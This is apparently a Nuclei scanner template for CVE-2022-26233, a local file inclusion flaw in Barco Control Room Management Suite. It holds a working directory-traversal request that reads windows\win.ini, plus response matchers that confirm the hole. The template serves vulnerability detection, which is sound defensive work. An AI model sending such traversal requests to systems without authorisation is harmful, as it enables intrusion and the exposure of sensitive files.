id: CVE-2022-26233 info: name: Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion author: 0x_Akoko severity: high description: Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring. reference: - https://0day.today/exploit/37579 - http://seclists.org/fulldisclosure/2022/Apr/0 - http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html - https://nvd.nist.gov/vuln/detail/CVE-2022-26233 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-26233 cwe-id: CWE-22 tags: cve,cve2022,barco,lfi,seclists,packetstorm requests: - raw: - |+ GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1 Host: {{Hostname}} unsafe: true matchers: - type: word part: body words: - "bit app support" - "fonts" - "extensions" condition: and # Enhanced by mp on 2022/07/15